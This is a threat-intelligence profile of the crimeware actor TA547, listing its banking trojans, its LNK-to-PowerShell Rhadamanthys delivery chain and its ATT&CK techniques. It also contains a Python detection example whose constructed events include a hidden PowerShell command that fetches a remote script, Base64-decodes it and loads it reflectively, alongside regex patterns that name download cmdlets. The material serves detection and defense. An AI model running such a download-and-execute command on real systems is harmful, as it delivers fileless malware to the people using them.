
TA547

Also known as: TA547

TA547 is a prolific, financially motivated cybercriminal threat actor, also tracked as Scully Spider, and is considered an initial access broker (IAB). The actor has primarily distributed banking trojans and other malware via email campaigns and has targeted multiple geographic regions, including Germany, Spain, Switzerland, Austria, the United States, and Australia. TA547 often uses geofencing and has blacklisted VPN exit IP addresses, which can limit payload retrieval by region. Banking malware distributed by TA547 includes ZLoader, The Trick, Ursnif, Gootkit, Corebot, Panda Banker, Atmos, Mazar Bot, Red Alert Android malware, and DanaBot. Proofpoint observed TA547 delivering DanaBot in 2018, including campaigns targeting Australia, and notes that TA547 regularly distributed DanaBot using affiliate IDs 5 and 6. Separate reporting says the gang tracked as TA547 and Scully Spider offered access to DanaBot for approximately $3,000 to $4,000 per month, and that from 2018 through 2020 DanaBot was delivered by TA547, TA571, and TA564. More recently, TA547 has used sophisticated banking malware, loaders, and information stealers. Since 2023, the actor has typically delivered NetSupport RAT, and has also delivered StealC and Lumma Stealer. In early 2024, TA547 was observed shifting from zipped JavaScript attachments to compressed LNK attachments. Proofpoint identified TA547 targeting German organizations with invoice-themed emails impersonating Metro and delivering Rhadamanthys. In that campaign, password-protected ZIP archives contained LNK files that launched PowerShell to fetch a remote script, decode a Base64-encoded Rhadamanthys payload, and execute it in memory as a .NET assembly. This was the first observed TA547 use of Rhadamanthys; the actor went on to leverage Rhadamanthys throughout 2024.

Researchers suspected that the PowerShell loader in the Rhadamanthys delivery chain carried comments consistent with AI-generated code, although Proofpoint stated this did not alter the payload itself and did not change defensive detection approaches. Broader ecosystem reporting also links RM3_boss's ISFB/Gozi-related ecosystem to TA547, alongside TA543, QQAAZZ, Evil Corp, and Dridex operations.
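One way to turn the LNK-to-PowerShell delivery chain described above into detection logic, as an added example that is not from the original page, from Proofpoint, or from Mallory. The process-creation events are constructed, the stage-to-technique mapping follows the ATT&CK IDs this page lists (T1059.001, T1105, T1140, T1620), and `stage_hits` and `triage` are hypothetical names.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1, reduced to three fields).
# All three are made up for this example; none are indicators from the original reporting.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ("powershell.exe -nop -w hidden -c \"$s=(New-Object Net.WebClient)"
                     ".DownloadString('https://example.invalid/s.ps1'); "
                     "$b=[System.Convert]::FromBase64String($s); "
                     "[System.Reflection.Assembly]::Load($b)\"")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c \"[Convert]::FromBase64String('SGVsbG8=')\""},
]


def stage_hits(event):
    """Return the ATT&CK IDs (as listed on this page) of the chain stages one event
    exhibits: LNK -> PowerShell -> remote fetch -> Base64 decode -> in-memory .NET load."""
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmd = event["CommandLine"].lower()
    hits = []
    # A double-clicked LNK does not appear in the process tree; its target runs as a
    # child of explorer.exe, so that parent/child pair stands in for the LNK stage.
    if image.endswith("powershell.exe") and parent.endswith("explorer.exe"):
        hits.append("T1059.001")
    # Remote script fetch (Ingress Tool Transfer).
    if re.search(r"downloadstring|invoke-webrequest|\biwr\b|net\.webclient|invoke-restmethod", cmd):
        hits.append("T1105")
    # Decoding of the fetched content (Deobfuscate/Decode Files or Information).
    if "frombase64string" in cmd:
        hits.append("T1140")
    # Loading the decoded bytes as a .NET assembly without touching disk (Reflective Code Loading).
    if re.search(r"reflection\.assembly\]::load", cmd):
        hits.append("T1620")
    return hits


def triage(events, min_stages=3):
    """Alert only when an event chains at least `min_stages` stages; a single stage
    (e.g. Base64 decoding in an admin script) is too noisy to alert on by itself."""
    return [{"image": e["Image"], "techniques": stage_hits(e)}
            for e in events if len(stage_hits(e)) >= min_stages]
```

Of the three constructed events only the first chains all four stages and is alerted on; the backup script and the vendor agent each match a single stage and are suppressed by the threshold.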

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

MITRE ATT&CK

Tradecraft

22 distinct techniques observed across reporting, grouped by tactic. Coverage: 8 of 15 tactics, 27 techniques. ×N = number of intelligence reports citing this technique.

TA0001  Initial Access (1 technique)
    T1566 (×2)  Phishing
        T1566.001  Spearphishing Attachment
        T1566.002  Spearphishing Link
        T1566.003  Spearphishing via Service

TA0002  Execution (2 techniques)
    T1059  Command and Scripting Interpreter
        T1059.001 (×2)  PowerShell
        T1059.005  Visual Basic
        T1059.007  JavaScript
    T1204  User Execution
        T1204.002 (×2)  Malicious File

TA0005  Stealth (3 techniques)
    T1027  Obfuscated Files or Information
        T1027.002  Software Packing
    T1140  Deobfuscate/Decode Files or Information
    T1620  Reflective Code Loading

TA0006  Credential Access (1 technique)
    T1056  Input Capture
        T1056.003  Web Portal Capture

TA0007  Discovery (2 techniques)
    T1082  System Information Discovery
    T1083  File and Directory Discovery

TA0009  Collection (3 techniques)
    T1056  Input Capture
        T1056.003  Web Portal Capture
    T1113  Screen Capture
    T1560  Archive Collected Data

TA0011  Command and Control (3 techniques)
    T1071  Application Layer Protocol
        T1071.001  Web Protocols
    T1090  Proxy
    T1105 (×2)  Ingress Tool Transfer

TA0010  Exfiltration (1 technique)
    T1041 (×2)  Exfiltration Over C2 Channel

IOCs

Observables

25 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.

Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping (22)

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal (15)

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables (25)

Domains, IPs, and hashes tied to this actor, refreshed continuously.